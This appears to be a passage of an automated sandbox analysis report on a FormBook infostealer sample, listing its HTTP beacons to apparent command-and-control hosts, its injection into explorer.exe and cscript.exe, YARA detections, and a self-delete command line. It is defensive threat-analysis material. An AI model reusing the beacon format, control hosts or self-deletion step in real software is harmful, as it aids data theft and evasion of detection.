                                    0192.168.2.34977734.102.136.18080C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 2, 2021 20:00:36.234204054 CET8401OUTGET /n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=BQDMjsZC/MHMhOokLNCZ8NvLdfoNcIlcbjuvjCJyzVYcZRVM3RE3M6YlVSnQ+pY87GBB HTTP/1.1
                                    Host: www.yr-golf.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Dec 2, 2021 20:00:36.476667881 CET8403INHTTP/1.1 403 Forbidden
                                    Server: openresty
                                    Date: Thu, 02 Dec 2021 19:00:36 GMT
                                    Content-Type: text/html
                                    Content-Length: 275
                                    ETag: "61973ffe-113"
                                    Via: 1.1 google
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.34979334.102.136.18080C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 2, 2021 20:00:41.543401957 CET8436OUTGET /n6fr/?r8Yhe8X=GhRWdiRsNNJH8eQL+yxTqcpdK2zUc5yAzRv8ilcs8c/60sXMgS13/r7ilAGjTWuYzon7&W0Gd5=_zrxFrQh HTTP/1.1
                                    Host: www.assisttm.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Dec 2, 2021 20:00:41.788599014 CET8437INHTTP/1.1 403 Forbidden
                                    Server: openresty
                                    Date: Thu, 02 Dec 2021 19:00:41 GMT
                                    Content-Type: text/html
                                    Content-Length: 275
                                    ETag: "61a4f026-113"
                                    Via: 1.1 google
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    2192.168.2.34981045.8.125.880C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 2, 2021 20:01:18.436930895 CET8482OUTGET /n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=RitrxMT4CF2430UT8yTHljH4YcWCFGycH+KnQUedz6G1CLl+fZ1eccWunXIbAos2Mzom HTTP/1.1
                                    Host: www.fastbest.host
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    Dec 2, 2021 20:01:18.510102034 CET8483INHTTP/1.1 404 Not Found
                                    Server: nginx/1.20.1
                                    Date: Thu, 02 Dec 2021 19:01:18 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 7081
                                    Connection: close
                                    Last-Modified: Mon, 27 Sep 2021 00:52:07 GMT
                                    ETag: "1ba9-5ccef81a2c93b"
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 66 61 73 74 62 65 73 74 20 2d 20 d0 a5 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 20 d0 b4 d0 bb d1 8f 20 d0 ba d0 b0 d0 b6 d0 b4 d0 be d0 b3 d0 be 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 73 71 55 49 6d 44 43 56 4b 41 73 37 2e 69 63 6f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 77 67 68 74 40 33 30 30 3b 34 30 30 3b 36 30 30 3b 37 30 30 3b 38 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4a 6f 73 65 66 69 6e 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 51 44 54 38 59 66 4e 30 42 46 63 4d 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 68 4b 66 71 4e 6a 77 58 50 53 7a 65 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 61 74 54 63 73 52 4a 4f 4c 6f 4d 6c 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 6f 68 4f 71 6c 77 38 70 6c 39 6e 68 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 4c 43 50 36 72 75 4c 70 4d 48 5a 58 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 4a 35 68 6c 79 71 37 76 34 4c 71 49 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 65 75 76 7a 64 30 52 4f 37 4d 6e 75 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 56 4b 65 49 68 34 52 47 67 34 30 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68
                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content> <title>fastbest - </title> <link rel="icon" type="image/png" href="sqUImDCVKAs7.ico"> <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;600;700;800&amp;display=swap" rel="stylesheet"> <link rel="preconnect" href="https://fonts.gstatic.com"> <link href="https://fonts.googleapis.com/css2?family=Josefin+Sans:wght@400;500;600;700&amp;display=swap" rel="stylesheet"> <link rel="stylesheet" href="css/QDT8YfN0BFcM.css"> <link rel="stylesheet" href="css/hKfqNjwXPSze.css"> <link rel="stylesheet" href="css/atTcsRJOLoMl.css"> <link rel="stylesheet" href="css/ohOqlw8pl9nh.css"> <link rel="stylesheet" href="css/LCP6ruLpMHZX.css"> <link rel="stylesheet" href="css/J5hlyq7v4LqI.css"> <link rel="stylesheet" href="css/euvzd0RO7Mnu.css"> <link rel="stylesheet" href="css/rVKeIh4RGg40.css"> <link rel="stylesh


                                    Code Manipulations

                                    Statistics

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    Analysis Process: Y1p8VPvyU2.exe PID: 7100 Parent PID: 1688

                                    General

                                    Start time:19:59:12
                                    Start date:02/12/2021
                                    Path:C:\Users\user\Desktop\Y1p8VPvyU2.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Y1p8VPvyU2.exe"
                                    Imagebase:0x400000
                                    File size:318467 bytes
                                    MD5 hash:83BE105C9FA2427BD6079F5D19659596
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    Analysis Process: Y1p8VPvyU2.exe PID: 1304 Parent PID: 7100

                                    General

                                    Start time:19:59:14
                                    Start date:02/12/2021
                                    Path:C:\Users\user\Desktop\Y1p8VPvyU2.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Y1p8VPvyU2.exe"
                                    Imagebase:0x400000
                                    File size:318467 bytes
                                    MD5 hash:83BE105C9FA2427BD6079F5D19659596
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    Analysis Process: explorer.exe PID: 3352 Parent PID: 1304

                                    General

                                    Start time:19:59:18
                                    Start date:02/12/2021
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0x7ff720ea0000
                                    File size:3933184 bytes
                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    Analysis Process: cscript.exe PID: 4816 Parent PID: 3352

                                    General

                                    Start time:19:59:40
                                    Start date:02/12/2021
                                    Path:C:\Windows\SysWOW64\cscript.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\cscript.exe
                                    Imagebase:0x1300000
                                    File size:143360 bytes
                                    MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:moderate

                                    Analysis Process: cmd.exe PID: 3192 Parent PID: 4816

                                    General

                                    Start time:19:59:44
                                    Start date:02/12/2021
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
                                    Imagebase:0xd80000
                                    File size:232960 bytes
                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Analysis Process: conhost.exe PID: 2332 Parent PID: 3192

                                    General

                                    Start time:19:59:46
                                    Start date:02/12/2021
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7f20f0000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Disassembly

                                    Code Analysis

                                    Reset < >